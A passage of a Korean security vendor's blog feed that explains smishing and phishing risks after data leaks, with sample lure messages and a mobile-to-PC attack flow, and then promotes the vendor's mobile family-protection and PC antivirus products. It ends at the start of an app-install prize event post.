&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;☑︎ 이메일 기반 피싱 페이지 유도&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;blockquote data-ke-style=&quot;style2&quot;&gt;&lt;b&gt;&quot;계정 보안 점검이 필요합니다. 즉시 본인 확인을 진행해주세요&quot;&lt;br /&gt;&lt;/b&gt;&lt;/blockquote&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;유출된 이메일 주소로 가짜 로그인 페이지 링크를 발송해, 아이디와 비밀번호를 직접 입력하도록 유도합니다. 이렇게 탈취된 계정은 금융 서비스나 업무 시스템 접근에 악용됩니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;☑︎ 연락처 기반 2차 확산 공격&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;blockquote data-ke-style=&quot;style2&quot;&gt;&lt;b&gt;&quot;어머니, 제 휴대폰이 고장 나서 새 번호로 연락드립니다. 급하게 돈이 필요해서...&quot;&lt;/b&gt;&lt;/blockquote&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;한 사람의 연락처를 탈취한 후, 저장된 가족&amp;middot;지인 정보를 활용해 연쇄적으로 공격을 확산시킵니다. 특히 부모님 세대는 자녀를 사칭한 메시지에 쉽게 속을 수 있습니다. 이런 공격은 '눈에 띄게 수상해 보이지 않는다'는 점이 가장 큰 특징이며, 스마트폰을 사용하는 부모님&amp;middot;고령층은 특히 취약합니다.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
&lt;div&gt;&amp;nbsp;&lt;/div&gt;
&lt;/div&gt;
&lt;h2 data-ke-size=&quot;size26&quot;&gt;&amp;nbsp;&lt;/h2&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;2. 공격이 모바일에서 PC로 확산되는 대표적 경로&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;많은 분들이 스미싱을 &quot;모바일 문제&quot;로만 인식하지만, 실제 금전 피해나 계정 탈취는 PC에서 일어나는 경우가 압도적으로 많습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;대표 시나리오&lt;b&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;&lt;span&gt;① 스마트폰으로 스미싱 문자 수신 &lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;&amp;nbsp; '배송 확인', '환불 처리' 등의 문구&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;② 링크 클릭 &amp;rarr; 악성앱 설치 또는 피싱 페이지 접속&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;&amp;nbsp; 연락처, SMS, 기기 정보 탈취&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;③ 탈취된 정보로 이메일&amp;middot;클라우드 계정 파악&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;&amp;nbsp; 비밀번호 재설정 링크 발송&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;④ 공격자가 PC 환경으로 접근 확대 &lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;&amp;nbsp; 업무 이메일, 클라우드 드라이브, 금융 서비스 접속&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;⑤ 랜섬웨어 감염 또는 직접적인 금전 피해 발생&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;&amp;nbsp; 파일 암호화, 계좌 이체, 정보 재판매&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;실제 사례&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;- 스마트폰에서 택배 관련 악성앱 설치&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;- 앱이 카카오톡&amp;middot;네이버 계정 정보 탈취&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;- 공격자가 PC에서 해당 계정으로 로그인&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;- 클라우드에 저장된 업무 문서&amp;middot;사진 접근&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;- 가족&amp;middot;동료에게 피싱 메시지 추가 발송&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;즉, 모바일&amp;ndash;PC가 연결된 하나의 공격 흐름으로 이해해야 합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h2 data-ke-size=&quot;size26&quot;&gt;&amp;nbsp;&lt;/h2&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;3. 모바일 보안: AI 기반 스미싱 탐지와 &amp;lsquo;가족 단위 보호&amp;rsquo;&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;최근 스미싱은 단순 링크 중심 공격이 아닌, 메시지의 '의도&amp;middot;문맥'을 정확히 파악해야 하는 정교한 형태로 변화하고 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;왜 AI 기반 탐지가 필요한가?&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;전통적 방식의 한계&lt;/b&gt;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;URL 블랙리스트만으로는 새로운 피싱 사이트 대응 불가&lt;/li&gt;
&lt;li&gt;문자 내용이 정상적으로 보이지만 의도가 악의적인 경우 탐지 어려움&lt;/li&gt;
&lt;li&gt;개인 맞춤형 공격(이름, 주소 포함)은 패턴 기반 탐지로 차단 불가&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;AI 기반 탐지의 장점&lt;/b&gt;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;메시지의 맥락과 의도를 분석해 스미싱 여부 판단&lt;/li&gt;
&lt;li&gt;새로운 유형의 공격도 실시간 학습으로 대응&lt;/li&gt;
&lt;li&gt;개인 정보가 포함된 정교한 스미싱도 탐지 가능&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&amp;nbsp;&lt;/h3&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;가족 단위 보호가 중요한 이유&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;실제 스미싱 피해는 부모님&amp;middot;어르신 &amp;rarr; 자녀&amp;middot;배우자 순으로 확산되는 사례가 흔합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;문제 상황&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;부모님이 스미싱 문자를 받고 링크 클릭&lt;/li&gt;
&lt;li&gt;악성앱이 설치되지만 본인은 인지하지 못함&lt;/li&gt;
&lt;li&gt;며칠 후 자녀의 계좌에서 이상 거래 발생&lt;/li&gt;
&lt;li&gt;뒤늦게 부모님 휴대폰이 감염된 사실 확인&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;해결 방법: 가족 보호 기능&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;부모님 휴대폰에서 위험 메시지 탐지 시 자녀에게 실시간 알림&lt;/li&gt;
&lt;li&gt;악성앱 설치 시도 즉시 차단 및 보호자 통지&lt;/li&gt;
&lt;li&gt;가족 구성원 4명까지 하나의 대시보드에서 통합 관리&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이런 구조를 고려할 때, 가족 구성원 휴대폰에서 발생한 위험을 내가 실시간으로 확인하고 조기에 대응할 수 있는 기능이 실질적 예방 효과를 높입니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;알약 모바일 패밀리케어&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;알약 모바일 앱의 '패밀리케어'는 AI 기반 스미싱 분석과 가족 보호 기능을 강화한 모바일 보안 서비스로, 최근 증가하는 '맞춤형 스미싱 패턴' 대응에 효과적으로 설계되었습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #f6e199;&quot;&gt;&lt;b&gt;주요 기능&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;Google Cloud 기반 Vertex AI &amp;amp; Gemini 모델 활용&lt;/li&gt;
&lt;li&gt;95% 이상 정확도의 스미싱 메시지 탐지&lt;/li&gt;
&lt;li&gt;가족 4대까지 통합 보안 관리&lt;/li&gt;
&lt;li&gt;부모님 휴대폰 위험 발생 시 자녀에게 실시간 알림&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;알약패밀리케어_설명_재편집.png&quot; data-origin-width=&quot;2000&quot; data-origin-height=&quot;2400&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bjVnih/dJMcadmUTAR/WVBkvxb8bcDfoqHMxgFKK1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bjVnih/dJMcadmUTAR/WVBkvxb8bcDfoqHMxgFKK1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bjVnih/dJMcadmUTAR/WVBkvxb8bcDfoqHMxgFKK1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbjVnih%2FdJMcadmUTAR%2FWVBkvxb8bcDfoqHMxgFKK1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;2000&quot; height=&quot;2400&quot; data-filename=&quot;알약패밀리케어_설명_재편집.png&quot; data-origin-width=&quot;2000&quot; data-origin-height=&quot;2400&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Group 2034384072 (3).png&quot; data-origin-width=&quot;651&quot; data-origin-height=&quot;122&quot;&gt;&lt;a href=&quot;https://bit.ly/4olZwSW&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/AKM0C/dJMcabiooUI/EVZkptIPVXpgsS0wUrebzK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FAKM0C%2FdJMcabiooUI%2FEVZkptIPVXpgsS0wUrebzK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;330&quot; height=&quot;62&quot; data-filename=&quot;Group 2034384072 (3).png&quot; data-origin-width=&quot;651&quot; data-origin-height=&quot;122&quot;/&gt;&lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;h2 data-ke-size=&quot;size26&quot;&gt;&amp;nbsp;&lt;/h2&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;4. 알약 3.0으로 안전한 PC 환경 만들기&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;알약 3.0은 차세대 행위 기반 엔진을 적용해, 랜섬웨어와 신종 악성코드를 사전 차단하는 데 최적화된 PC 보안 환경을 제공합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #f6e199;&quot;&gt;&lt;b&gt;주요 특징&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;실시간 행위 분석 엔진으로 랜섬웨어 사전 차단&lt;/li&gt;
&lt;li&gt;클라우드 기반 최신 위협 대응&lt;/li&gt;
&lt;li&gt;USB 자동 검사 및 안전하지 않은 Wi-Fi 연결 차단&lt;/li&gt;
&lt;li&gt;정밀 탐지 엔진으로 성능과 보안 동시 강화&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;모바일에서 탐지되지 못한 공격이 PC로 넘어오더라도 마지막 단계에서 방어할 수 있는 안정적인 보호막 역할을 수행합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;3 3.png&quot; data-origin-width=&quot;2160&quot; data-origin-height=&quot;2700&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/Af8Ry/dJMcaaDMcCM/3cCsKdkH8n2DK3hevYst0k/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/Af8Ry/dJMcaaDMcCM/3cCsKdkH8n2DK3hevYst0k/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/Af8Ry/dJMcaaDMcCM/3cCsKdkH8n2DK3hevYst0k/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FAf8Ry%2FdJMcaaDMcCM%2F3cCsKdkH8n2DK3hevYst0k%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;2160&quot; height=&quot;2700&quot; data-filename=&quot;3 3.png&quot; data-origin-width=&quot;2160&quot; data-origin-height=&quot;2700&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Group 2034384072 (4).png&quot; data-origin-width=&quot;651&quot; data-origin-height=&quot;122&quot;&gt;&lt;a href=&quot;https://bit.ly/48I8W6F&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/I57gO/dJMcabiooU0/vYj0QYj5ekwAeMuLV5ZfVk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FI57gO%2FdJMcabiooU0%2FvYj0QYj5ekwAeMuLV5ZfVk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;330&quot; height=&quot;62&quot; data-filename=&quot;Group 2034384072 (4).png&quot; data-origin-width=&quot;651&quot; data-origin-height=&quot;122&quot;/&gt;&lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&amp;nbsp;&lt;/h3&gt;
&lt;h2 data-ke-size=&quot;size26&quot;&gt;&amp;nbsp;&lt;/h2&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;최근 연이은 개인정보 유출 사고로 인해 스미싱&amp;middot;피싱 공격이 더욱 정교해지고 있습니다. 하지만 올바른 보안 도구와 기본 수칙을 함께 실천하면 대부분의 위험을 사전에 차단할 수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이스트시큐리티는 알약 모바일 패밀리케어와 알약 3.0을 통해 사용자 여러분의 모바일&amp;middot;PC 전반을 아우르는 보안 환경을 강화하고 있으며, 앞으로도 변화하는 보안 위협에 대응하기 위한 기술적 고도화를 지속하겠습니다. 지금 바로 여러분과 가족의 디지털 안전을 점검해보세요.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>이스트시큐리티 소식</category>
      <category>PC보안</category>
      <category>개인정보보호</category>
      <category>고객정보유출</category>
      <category>모바일보안</category>
      <category>보안수칙</category>
      <category>알약</category>
      <category>정보유출</category>
      <category>정보유출사고</category>
      <category>쿠팡</category>
      <category>패밀리케어</category>
      <author>알약5</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5688</guid>
      <comments>https://alyacofficialblog.tistory.com/5688#entry5688comment</comments>
      <pubDate>Tue, 9 Dec 2025 15:05:48 +0900</pubDate>
    </item>
    <item>
      <title>알약 모바일 앱 설치 경품 이벤트! 100만원 행운의 주인공은?</title>
      <link>https://alyacofficialblog.tistory.com/5687</link>
      <description>&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;안녕하세요, 이스트시큐리티입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;알약 모바일 앱을 신규 설치해 주신 모든 분들을 위한 웰컴 이벤트가 진행중입니다. 앱 설치 후 응모 버튼만 클릭하면 누구나 간단히 참여할 수 있으며, 추첨을 통해 신세계 100만 원 상품권을 포함한 다양한 경품을 드립니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #333333; text-align: start;&quot;&gt;이번 이벤트는 알약을 처음 설치해 주신 고객 여러분께 감사의 마음을 전하고, 더 나은 보안 경험을 제공하기 위해 준비된 특별 프로모션입니다.&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;b&gt;신세계백화점 상품권 100만 원권부터 스타벅스 아메리카노, 네이버페이 포인트, GS25 모바일상품권&lt;/b&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #333333; text-align: start;&quot;&gt;까지 다양한 경품이 준비되어있으니 꼭 참여해 보세요!&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;promotion_1.png&quot; data-origin-width=&quot;1440&quot; data-origin-height=&quot;2304&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/U0ZAa/dJMcahCUQsM/GMoC8daAmskuW6uqTglbHk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/U0ZAa/dJMcahCUQsM/GMoC8daAmskuW6uqTglbHk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/U0ZAa/dJMcahCUQsM/GMoC8daAmskuW6uqTglbHk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FU0ZAa%2FdJMcahCUQsM%2FGMoC8daAmskuW6uqTglbHk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1440&quot; height=&quot;2304&quot; data-filename=&quot;promotion_1.png&quot; data-origin-width=&quot;1440&quot; data-origin-height=&quot;2304&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Button (1).png&quot; data-origin-width=&quot;984&quot; data-origin-height=&quot;156&quot;&gt;&lt;a href=&quot;https://play.google.com/store/apps/details?id=com.estsoft.alyac&amp;amp;referrer=utm_source%3Dalyacapp_download%26utm_medium%3Dsktsms&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/Hb1zz/dJMcaaX6mRB/bg5pI6klpx6XX5FRPmBot1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FHb1zz%2FdJMcaaX6mRB%2Fbg5pI6klpx6XX5FRPmBot1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;984&quot; height=&quot;156&quot; data-filename=&quot;Button (1).png&quot; data-origin-width=&quot;984&quot; data-origin-height=&quot;156&quot;/&gt;&lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;이벤트 정보&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
